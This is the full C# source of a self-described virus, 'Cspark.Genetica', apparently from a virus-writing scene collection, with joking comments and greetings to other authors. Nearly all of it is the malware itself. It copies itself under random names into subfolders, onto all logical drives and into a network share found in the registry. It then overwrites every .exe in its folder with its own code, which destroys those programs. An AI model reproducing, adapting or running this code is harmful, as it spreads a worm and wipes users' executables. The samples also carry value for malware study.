 |
 |
|||||
 |
 |
 |
 |
 |
 |
|
 |
 |
 |
||||
Cspark.Genetica
by Genetix
using System;
using System.IO;
using System.Collections.Generic;
using System.Text;
using Microsoft.Win32;
//peter ferrie: HI!! I'm Genetix :)
//Virus: Cspark.Genetica
namespace Genetica
{
class Program
{
static void Main(string[] args)
{
//define the variables / int's & ect that will be used in this craptastic virus.
string[] files = null;Int16 i = 0;int s = 0;int NameLen = 5;
string AppName, AppPath, strName = null;
RegistryKey key = Registry.LocalMachine.OpenSubKey(@"System\CurrentControlSet\Services\lanmanserver\Shares", false);
object readkey = key.GetValue("shared");
string stringValue = readkey as string;
//characters used in the random name
char[] rndname = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789".ToCharArray();
//create an array of all Logical Drives
string[] Drives = Directory.GetLogicalDrives();
//for the random name
System.Random random = new Random();
//get virus fullpath & name
AppName = System.Reflection.Assembly.GetExecutingAssembly().Location;
//get virus path
AppPath = System.Environment.CurrentDirectory;
//check if the path is correct, if not, correct it
if (AppPath.Substring(AppPath.Length - 1) != "\\") {
AppPath += "\\";
}
//get victim files
files = System.IO.Directory.GetFiles(AppPath);
//check for subfolders
string[] SubFolders = Directory.GetDirectories(AppPath, "*");
//create a random name for the copy of the virus (if any copies are made)
for (int z = 0; z < NameLen; z++)
{
int intRandom = random.Next(rndname.Length);
strName += rndname[intRandom].ToString();
}
//copy to subfolders (if any were found)
for (int x = 0, j = SubFolders.Length; x < j; x++)
{
if (SubFolders[x].Substring(SubFolders[x].Length - 1) != "\\")
{
SubFolders[x] += "\\";
File.Copy(AppName, SubFolders[x] + strName + ".exe");
}
}
//loop though the array of Logical Drives and copy to them
for (s = 0; s <= Drives.GetUpperBound(0); s++)
{
try
{
File.Copy(AppName, Drives[s] + strName + ".exe");
}
catch
{
continue;
}
}
//find shared folder in registry (thank you retro!)
string[] stringArray = readkey as string[];
string path = stringArray[2];
if (stringArray != null)
{
try
{
System.Collections.IEnumerator myEnumerator = stringArray.GetEnumerator();
string justPath = path.Substring(path.Length - (path.Length - 5));
justPath += "\\";
File.Copy(AppName, justPath + strName + ".exe");
}
catch
{
}
}
//Begin file infection:
for (i = 0; i < files.GetUpperBound(0); i++) //Loop through the array of files
{
//Loop through the array of files & check if they are .exe
if (files[i].Substring(files[i].Length - (files[i].Length - files[i].Length + 4)) == ".exe")
{
//Avoid writing to itself
if (("\r\n"+files[i]) != AppName)
{
try
{
string virus = AppName; //The virus
string victim = files[i]; //The victim files
//Open the virus for reading
System.IO.FileStream ReadSelf = new System.IO.FileStream(virus, System.IO.FileMode.Open, System.IO.FileAccess.Read);
//Open the victim for writing (or create)
System.IO.FileStream Infect = new System.IO.FileStream(victim, System.IO.FileMode.Create, System.IO.FileAccess.Write);
//read itself, write itself to other files:
byte[] buffer = new byte[ReadSelf.Length];
ReadSelf.Read(buffer, 0, Convert.ToInt32(ReadSelf.Length));
Infect.Write(buffer, 0, Convert.ToInt32(ReadSelf.Length));
ReadSelf.Close();
Infect.Close();
ReadSelf.Dispose();
Infect.Dispose();
}
catch
{
continue;
}
}
}
}
Console.Write("Retro is Evil!!");
Console.Read();
}
}
}
//kefi retro spth falckon dr3f blueowl, your all truly sexy geeks!